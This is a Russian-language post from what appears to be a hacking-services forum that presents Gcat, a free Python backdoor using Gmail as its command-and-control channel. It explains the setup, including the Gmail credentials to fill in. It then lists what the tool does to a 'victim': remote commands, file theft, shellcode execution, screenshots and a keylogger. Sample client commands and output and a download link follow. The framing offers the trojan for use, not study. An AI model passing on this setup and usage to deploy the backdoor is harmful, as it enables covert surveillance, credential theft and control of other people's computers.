Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о Gcat. Gcat является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис Gmail, для так называемого command and control сервера.

Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией Allow less secure apps, которую можно включать в настройках вашей учетной записи.

Данный нам репозиторий содержит в себе всего лишь 2 файла:

  • Gcat.py – сам скрипт, который перечисляет все доступные клиенты и передает им команды
  • Implant.py – является самим бэкдором

Чтобы все заработало, нужно изменить всего лишь две переменные, а именно: gmail_user, gmail_pwd.

Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды:

Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер.

Вот так выглядит запуск различных команд в клиенте:

# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’

[*] Command sent successfully with jobid: SH3C4gv

После чего запрашиваем результат для определенного Id и JobId:

# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv

DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’

JOBID: SH3C4gv

FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’

CMD: ‘ipconfig /all

Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты.

Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat

Данный троян можно запустить на таких операционных системах как Windows и различные Unix-подобные системы.

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,324
    Total Members
    30,834
    Most Online
    Елен
    Newest Member
    Елен
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.